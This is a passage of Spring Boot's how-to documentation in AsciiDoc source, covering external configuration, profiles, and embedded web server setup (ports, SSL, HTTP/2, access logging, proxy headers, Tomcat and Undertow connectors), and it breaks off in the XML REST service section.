Boot banner is not printed on startup, and the application is not starting an embedded web server.\n\nProperties defined in external configuration override the values specified with the Java API, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses three sources for the `ApplicationContext` (in the following order): `demo.MyApp`, `com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a defined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in the '`Spring Boot features`' section for the exact order).\n\nYou can also provide the following System properties (or environment variables) to change the behavior:\n\n* configprop:spring.config.name[] (configprop:spring.config.name[format=envvar]): Defaults to `application` as the root of the file name.\n* configprop:spring.config.location[] (configprop:spring.config.location[format=envvar]): The file to load (such as a classpath resource or a URL).\n A separate `Environment` property source is set up for this document and it can be overridden by system properties, environment variables, or the command line.\n\nNo matter what you set in the environment, Spring Boot always loads `application.properties` as described above.\nBy default, if YAML is used, then files with the '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the candidates it has not found at `TRACE` level.\n\nSee {spring-boot-module-code}\/context\/config\/ConfigFileApplicationListener.java[`ConfigFileApplicationListener`] for more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to set configuration properties on the command line.\nYou can enable this behavior by using placeholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter token of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is, `@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style placeholders.\nIf you have enabled Maven filtering for the `application.properties` directly, you may want to also change the default filter token to use https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku or Cloud Foundry.\nIn those two platforms, the `PORT` environment variable is set automatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external properties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already included if you use the `spring-boot-starter`).\nA YAML file is parsed to a Java `Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it is one level deep and has period-separated keys, as many people are used to with `Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in the '`Spring Boot features`' section for more information about YAML.\n\n\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property (configprop:spring.profiles.active[]) or an OS environment variable (configprop:spring.profiles.active[format=envvar]).\nAlso, you can launch your application with a `-D` argument (remember to put it before the main class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting but not by the `SpringApplicationBuilder.profiles()` method.\nThus, the latter Java API can be used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in the \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each document is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value (a comma-separated list of profiles) is fed into the Spring `Environment.acceptsProfiles()` method.\nIf any of those profiles is active, that document is included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000.\nHowever, if the Spring profile called '`development`' is active, then the port is 9001.\nIf '`production`' is active, then the port is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered.\nLater values override earlier values.\n\nTo do the same thing with properties files, you can use `application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and other places) into an application at runtime.\nThere is not (and technically cannot be) an exhaustive list of all supported properties in a single location, because contributions can come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows all the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties.adoc#common-application-properties, `application.properties`>> example with a list of the most common properties supported by Spring Boot.\nThe definitive list comes from searching the source code for `@ConfigurationProperties` and `@Value` annotations as well as the occasional use of `Binder`.\nFor more about the exact ordering of loading properties, see \"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\nEach Spring Boot web application includes an embedded web server.\nThis feature leads to a number of how-to questions, including how to change the embedded server and how to configure the embedded server.\nThis section answers those questions.\n\n\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including `spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or `spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty by including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`, `spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies in addition to including the one you need.\nSpring Boot provides separate starters for HTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow 2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring WebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-webflux') {\n\t\t exclude group: 'org.springframework.boot', module: 'spring-boot-starter-reactor-netty'\n\t\t}\n\t\t\/\/ Use Undertow instead\n\t\timplementation 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so you may need to keep a dependency on Netty even when you need to include a different HTTP server.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will automatically start it.\nTo disable this behavior configure the `WebApplicationType` in your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with configprop:server.port[] (for example, in `application.properties` or as a System property).\nThanks to relaxed binding of `Environment` values, you can also use configprop:server.port[format=envvar] (for example, as an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`, use `server.port=-1` (doing so is sometimes useful for testing).\n\nFor more details, see \"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\" in the '`Spring Boot Features`' section, or the {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`] source code.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the `ServletWebServerApplicationContext` through its `WebServer`.\nThe best way to get that and be sure that it has been initialized is to add a `@Bean` of type `ApplicationListener<ServletWebServerInitializedEvent>` and pull the container out of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can also inject the actual port into a field by using the `@LocalServerPort` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`.\nDo not try to inject the port in a regular application.\nAs we just saw, the value is set only after the container has been initialized.\nContrary to a test, application code callbacks are processed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow.\nIt can be enabled in `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be performed.\nYou can configure this behavior by setting the configprop:server.compression.min-response-size[] property.\n\nBy default, responses are compressed only if their content type is one of the following:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the configprop:server.compression.mime-types[] property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties, typically in `application.properties` or `application.yml`.\nThe following example shows setting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {spring-boot-module-code}\/web\/server\/Ssl.java[`Ssl`] for details of all of the supported properties.\n\nUsing configuration such as the preceding example means the application no longer supports a plain HTTP connector at port 8080.\nSpring Boot does not support the configuration of both an HTTP connector and an HTTPS connector through `application.properties`.\nIf you want to have both, you need to configure one of them programmatically.\nWe recommend using `application.properties` to configure HTTPS, as the HTTP connector is the easier of the two to configure programmatically.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the configprop:server.http2.enabled[] configuration property.\nThis support depends on the chosen web server and the application environment, since that protocol is not supported out-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol.\nSo you must <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the https:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies: `org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when using JDK 9 or later.\nAlternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative` library and its dependencies are installed on the host operating system.\n\nThe library directory must be made available, if not already, to the JVM library path.\nYou can do so with a JVM argument such as `-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`.\nMore on this in the https:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports HTTP\/2 with native libraries.\nTo enable that, your application needs to have an additional dependency.\n\nSpring Boot manages the version for the `io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for all platforms.\nDevelopers can choose to import only the required dependencies using a classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official documentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\nGenerally, you should first consider using one of the many available configuration keys and customize your web server by adding new entries in your `application.properties` (or `application.yml`, or environment, etc. see \"`<<howto-discover-build-in-options-for-external-properties>>`\").\nThe `server.{asterisk}` namespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`, `server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<appendix-application-properties.adoc#common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL or HTTP\/2.\nHowever, if a configuration key doesn't exist for your use case, you should then look at {spring-boot-module-api}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your choice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty, Undertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to configure specific parts, like connectors, server resources, or the server itself - all using server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will override the one provided by Spring Boot.\nIn this case, you can't rely on configuration properties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two ways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners supported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must provide a `@Bean` definition for it.\nDoing so can be very useful when you want to inject configuration or dependencies.\nHowever, you must be very careful that they do not cause eager initialization of too many other beans, because they have to be installed in the container very early in the application lifecycle.\n(For example, it is not a good idea to have them depend on your `DataSource` or JPA configuration.)\nYou can work around such restrictions by initializing the beans lazily when first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by adding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in addition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used.\nThis aligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please make sure to check the \"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\" section.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any `Servlet` or `Filter` beans are registered with the servlet container automatically.\nTo disable registration of a particular `Filter` or `Servlet` bean, create a registration bean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically registered with an embedded servlet container by annotating a `@Configuration` class with `@ServletComponentScan` and specifying the package(s) containing the components that you want to register.\nBy default, `@ServletComponentScan` scans from the package of the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective namespaces.\n\nFor instance, the following settings log access on Tomcat with a {tomcat-docs}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base directory.\nBy default, the `logs` directory is a temporary directory, so you may want to fix Tomcat's base directory or use an absolute path for the logs.\nIn the preceding example, the logs are available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the application.\nYou can customize this location by setting the configprop:server.undertow.accesslog.dir[] property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`.\nFor more details, see {jetty-docs}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nIf your application is running behind a proxy, a load-balancer or in the cloud, the request information (like the host, port, scheme...) might change along the way.\nYour application may be running on `10.10.10.10:8080`, but HTTP clients should only see `example.org`.\n\nhttps:\/\/tools.ietf.org\/html\/rfc7239[RFC7239 \"Forwarded Headers\"] defines the `Forwarded` HTTP header; proxies can use this header to provide information about the original request.\nYou can configure your application to read those headers and automatically use that information when creating links and sending them to clients in HTTP 302 responses, JSON documents or HTML pages.\nThere are also non-standard headers, like `X-Forwarded-Host`, `X-Forwarded-Port`, `X-Forwarded-Proto`, `X-Forwarded-Ssl`, and `X-Forwarded-Prefix`.\n\nIf the proxy adds the commonly used `X-Forwarded-For` and `X-Forwarded-Proto` headers, setting `server.forward-headers-strategy` to `NATIVE` is enough to support those.\nWith this option, the Web servers themselves natively support this feature; you can check their specific documentation to learn about specific behavior.\n\nIf this is not enough, Spring Framework provides a {spring-framework-docs}\/web.html#filters-forwarded-headers[ForwardedHeaderFilter].\nYou can register it as a Servlet Filter in your application by setting `server.forward-headers-strategy` is set to `FRAMEWORK`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the configprop:server.forward-headers-strategy[] property defaults to `NATIVE`.\nIn all other instances, it defaults to `NONE`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to carry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.remoteip.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal proxies that are to be trusted.\nBy default, IP addresses in `10\/8`, `192.168\/16`, `169.254\/16` and `127\/8` are trusted.\nYou can customize the valve's configuration by adding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for configuration.\nIf you use YAML, single backslashes are sufficient, and a value equivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do so in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by switching the automatic one off (to do so, set `server.forward-headers-strategy=NONE`) and adding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the `TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and HTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + keystore\n\t\t\t\t\t+ \"] or truststore: [\" + truststore + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values compliant with later Cookie specifications.\nIf, however, you cannot change the way that cookies are written, you can instead configure Tomcat to use a `LegacyCookieProcessor`.\nTo switch to the `LegacyCookieProcessor`, use an `WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-tomcat-mbean-registry]]\n=== Enable Tomcat's MBean Registry\nEmbedded Tomcat's MBean registry is disabled by default.\nThis minimizes Tomcat's memory footprint.\nIf you want to use Tomcat's MBeans, for example so that they can be used to expose metrics via Micrometer, you must use the configprop:server.tomcat.mbeanregistry.enabled[] property to do so, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\nserver.tomcat.mbeanregistry.enabled=true\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and add a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans with the underlying WebSocket container.\nWhen deployed to a standalone servlet container, this role is performed by a servlet container initializer, and the `ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\nSpring Boot has a number of starters that include Spring MVC.\nNote that some starters include a dependency on Spring MVC rather than include it directly.\nThis section answers common questions about Spring MVC and Spring Boot.\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by default as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy object), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by default.\nNote that, in a browser, you might sometimes see XML responses, because browsers tend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you can use it to render XML responses.\nThe previous example that we used for JSON would work.\nTo use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered with the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8.\nIf you're using a more recent Java generation, add the following dependency to your 